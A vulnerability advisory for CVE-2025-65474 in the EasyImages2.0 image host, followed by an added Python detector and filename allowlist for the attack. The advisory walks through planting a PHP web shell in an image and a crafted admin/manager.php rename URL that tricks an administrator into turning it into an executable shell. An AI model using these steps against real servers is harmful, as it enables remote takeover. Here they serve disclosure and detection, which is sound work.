CVE-2025-65474
icret/EasyImages2.0/2.8.6 before
Remote
An attacker first embeds a PHP web shell into a normal image, renames it to an SVG file to bypass upload compression, uploads it to the EasyImages2.0 system, and then constructs a malicious admin/manager.php URL (with p for the file directory, ren for the SVG filename, and to for a PHP filename) to trick an administrator into clicking it; this renames the SVG to a PHP file, enabling the attacker to use tools like AntSword for remote code execution.
github: https://github.com/icret/EasyImages2.0
target: http://xxx.com/admin/manager.php?p=xxx&ren=xxx&xxx
Start the environment directly with the command: docker run -itd --name easyimage -p 8777:80 -e TZ=Asia/Shanghai -e PUID=1000 -e PGID=1000 -e DEBUG=false -v /root/data/docker_data/easyimage/config:/app/web/config -v /root/data/docker_data/easyimage/i:/app/web/i ddsderek/easyimage:latest
- Start with a normal image, open it with a text editor, and append a web shell script at the end.
- Rename the file extension from .png to .svg to avoid damage from image compression during upload. Upload the modified file to the image hosting service.
- We obtained the address http://x.x.x.x:8777/i/2025/11/04/z2b9th.svg and constructed the payload as:
  http://x.x.x.x:8777/admin/manager.php?p=2025%2F11%2F04&ren=z2b9th.svg&to=congsec.php
  Where:
  - p represents the image directory
  - ren is the original image name
  - to is the modified filename
- The exploit works by tricking an administrator into clicking the link, which rewrites the malicious SVG file into a PHP web shell, enabling server-side execution.
- When the administrator clicks the link, the file is renamed to congsec.php.
- Use a tool like AntSword to connect to the web shell at http://x.x.x.x:8777/i/2025/11/04/congsec.php and execute arbitrary commands.
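Added example, not part of the CVE record or of the EasyImages2.0 project: a defender-side check for the rename pattern described above. It scans constructed web-server access lines for requests to admin/manager.php whose to parameter names an executable extension, and shows a server-side allowlist that would reject such a rename target. The executable-extension list, the allowlist, the log format and the sample log lines are all assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Extensions a PHP-serving host may execute (assumed list, extend per server config).
EXECUTABLE_EXTS = (".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps")
# Extensions an image host legitimately serves (assumed allowlist for rename targets).
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif", ".webp", ".svg")


def rename_request_is_suspicious(url: str) -> bool:
    """True for a manager.php request whose 'to' parameter ends in an executable extension.
    parse_qs percent-decodes values, so an encoded 'to' is handled the same way."""
    parts = urlsplit(url)
    if not parts.path.endswith("/admin/manager.php"):
        return False
    target = parse_qs(parts.query).get("to", [""])[0].strip().lower()
    return target.endswith(EXECUTABLE_EXTS)


def is_safe_rename_target(name: str) -> bool:
    """Server-side allowlist for a new file name: no path separators, exactly one dot
    (rejects double extensions such as shell.php.png) and an image extension only."""
    if "/" in name or "\\" in name or name.count(".") != 1:
        return False
    return name.lower().endswith(IMAGE_EXTS)


# Common-log-format line: ip ident user [time] "METHOD path proto" status size (assumed format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3})')


def scan_access_log(lines):
    """Return (client_ip, timestamp, request_path) for every suspicious rename request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, _method, path, _status = m.groups()
        if rename_request_is_suspicious(path):
            hits.append((ip, ts, path))
    return hits


# Constructed sample log: one rename-to-PHP request, one benign rename, one plain file fetch.
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Nov/2025:10:15:01 +0800] "GET /admin/manager.php?p=2025%2F11%2F04&ren=z2b9th.svg&to=congsec.php HTTP/1.1" 200 512',
    '198.51.100.9 - - [04/Nov/2025:10:16:12 +0800] "GET /admin/manager.php?p=2025%2F11%2F04&ren=a.png&to=b.png HTTP/1.1" 200 512',
    '203.0.113.7 - - [04/Nov/2025:10:14:30 +0800] "GET /i/2025/11/04/z2b9th.svg HTTP/1.1" 200 4096',
]
```

Because the rename is triggered by a GET the administrator is lured into opening, the hit's client IP is the administrator's browser, not the attacker's; correlate it with the earlier upload of the .svg file when investigating.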